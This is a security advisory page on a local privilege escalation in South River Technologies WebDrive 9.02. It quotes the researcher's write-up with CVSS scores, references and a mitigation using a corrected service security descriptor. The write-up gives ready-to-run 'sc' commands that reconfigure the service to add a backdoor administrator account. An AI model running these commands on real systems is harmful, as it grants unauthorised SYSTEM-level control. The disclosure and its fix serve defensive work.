South River Technologies WebDrive Local Elevation Of Privileges

2010-01-13 / 2010-01-14
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges by Nine:Situations:Group::bellick site: http://retrogod.altervista.org/ Software site: http://www.webdrive.com/ Download location: http://www.webdrive.com/download/index.html Tested against: South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3 The "WebDrive Service" is installed with an empty security descriptor. A malicious user can stop the service, then invoke the "sc config" command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user: sc stop WebDriveService sc config WebDriveService binPath= "cmd /c net user southriver kills /add && net localgroup Administrators southriver /add" sc start WebDriveService runas /noprofile /user:%COMPUTERNAME%\southriver cmd now login as administrator with password "kills" mitigation: the security descriptor of the service is like this: C:\>sc sdshow WebDriveService D: change the security descriptor like the following: c:\sc sdset WebDriveService D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSD RCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY) [SC] SetServiceObjectSecurity SUCCESS original url: http://retrogod.altervista.org/9sg_south_river_priv.html

References:

http://xforce.iss.net/xforce/xfdb/53885
http://www.vupen.com/english/advisories/2009/2994
http://www.securityfocus.com/archive/1/archive/1/507323/100/0/threaded
http://secunia.com/advisories/37083
http://retrogod.altervista.org/9sg_south_river_priv.html
http://osvdb.org/59080


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top